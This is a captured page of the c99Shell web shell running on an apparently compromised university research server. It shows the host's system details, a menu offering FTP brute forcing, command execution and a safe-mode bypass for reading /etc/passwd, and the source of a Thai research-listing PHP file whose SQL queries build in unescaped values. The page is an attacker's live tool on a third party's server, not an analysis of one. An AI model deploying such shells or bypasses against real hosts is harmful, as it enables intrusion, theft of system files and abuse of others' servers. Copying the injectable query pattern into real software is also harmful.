!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage_22222/edu_depart/   drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.17%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     ResearchByType.php (4.75 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

include("../include/FunctionDB.php");
include(
"admin_menu.php");
include(
"../include/Function.php");
ConnectDB();
$sql "Select * From research_tb  Group By Research_type";
$result mysql_query($sql) or die(" Error").mysql_error();
$num mysql_num_rows($result);
?> 

<meta http-equiv="Content-Type" content="text/html; charset=TIS-620">

<table width="741" border="0" cellpadding="0" cellspacing="0">
    <tr>
        <td width="741" ><br> 
          <fieldset>
            <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="index.php">หน้าหลัก</a> <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="SearchRes.php">ค้นหางานวิจัย</a></font><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle" /> รายชื่อข้อมูลงานวิจัย</font></legend>
            <label>
  <form id="form1" name="form1" method="post" action="">
    <p><font size="2" face="Tahoma"><img src="../picture/previous.gif" onclick="window.history.back()"  width="85" height="22" border="0" /></font></p>
    <table width="66%" border="0" align="center" cellpadding="0" cellspacing="0" bgcolor="#EEEEEE" style="border:0px solid gray">
      <tr>
        <td height="21" colspan="3" bgcolor="#FFCC99"><div align="center"><font color="#000000" size="3" face="Tahoma"><strong>ข้อมูลงานวิจัยแยกตามลักษณะงานวิจัย</strong></font></div></td>
      </tr>
      <tr bordercolor="#0066CC">
        <td width="44" align="center" bgcolor="#CCCCCC" style="border:1px solid gray"><font color="#000000" size="2" face="Tahoma">ลำดับ</font></td>
        <td width="319" align="center" bgcolor="#CCCCCC" style="border:1px solid gray"><font color="#000000" size="2" face="Tahoma">ลักษณะงานวิจัย</font></td>
        <td width="119" align="center" bgcolor="#CCCCCC" style="border:1px solid gray"><font size="2" face="Tahoma">จำนวนผลงานวิจัย</font></td>
      </tr>
      <?
$i 
1;
 while(
$rs mysql_fetch_array($result))
 {

     if(
$count==0)
     {
?>
      <tr bgcolor="#F9FEFF" onmouseover="this.style.backgroundColor='#99CCFF'" onmouseout="this.style.backgroundColor='#F9FEFF'" >
        <td height="18"><div align="center"><font size="2" face="Tahoma"><?echo $i?></font></div></td>
        <td><font color="#000000" size="2" face="Tahoma"> <a href="TypeList.php?Research_char=<? echo "$rs[Research_char]"?>" class="black">
          <?php
      $Research_code 
$rs[Research_code];
      
$sql9 "Select * From research_tb Where Research_code='$Research_code'";
      
$result9 mysql_query($sql9) or die("Error".mysql_error());
      
$rss9 mysql_fetch_array($result9);
      echo
"$rss9[Research_type]";
             
?>
        </a> </font></td>
        <td bordercolor="#EBFAFE"><div align="center"><font size="2" face="Tahoma">
            <?php
      $Research_char 
$rs[Research_char];
      
$sql3 ="Select * From research_tb Where Research_char='$Research_char'";
      
$result3 mysql_query($sql3) or die("Error".mysql_error());
      
$count mysql_num_rows($result3);
      echo 
"$count";
          
?>
        </font></div></td>
      </tr>
      <?
    $count
=1;
     }
else
{
?>
      <tr bgcolor="#FFFFFF"  onmouseover="this.style.backgroundColor='#99CCFF'" onmouseout="this.style.backgroundColor='#FFFFFF'" >
        <td align="center"><font size="2" face="Tahoma"><?echo $i?></font></td>
        <td><font color="#000000" size="2" face="Tahoma"> <a href="#" class="black"> </a><a href="TypeList.php?Research_char=<? echo "$rs[Research_char]"?>" class="black">
          <?php
      $Research_code 
$rs[Research_code];
      
$sql9 "Select * From research_tb Where Research_code='$Research_code'";
      
$result9 mysql_query($sql9) or die("Error".mysql_error());
      
$rss9 mysql_fetch_array($result9);
      echo
"$rss9[Research_type]";
             
?>
        </a><a href="#" class="black"> </a> </font></td>
        <td><div align="center"><font size="2" face="Tahoma">
            <?php
      $Research_char 
$rs[Research_char];
      
$sql3 ="Select * From research_tb Where Research_char='$Research_char'";
      
$result3 mysql_query($sql3) or die("Error".mysql_error());
      
$count mysql_num_rows($result3);
      echo 
"$count";
          
?>
        </font></div></td>
      </tr>
      <?
$count
=0;
}
$i++;
 }    
?>
      <tr>
        <td colspan="3" align="center" bgcolor="#FFCC99"><div align="center"><strong><font color="#000000" size="2" face="Tahoma">ทั้งหมด</font><font color="#FF0000" size="2" face="Geneva, Arial, Helvetica, sans-serif"> <? echo $num ?><font color="#000000" face="Tahoma"> คน</font></font></strong></div></td>
      </tr>
    </table>
  </form>
          </fieldset>
        <br>
        <font color="<?php echo $GLOBALS["COLOR_FONT_3"];?>" size="2"><b>หมายเหตุ :</b> ใช้เมาส์คลิกที่ชื่อ<br>
      </font></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0069 ]--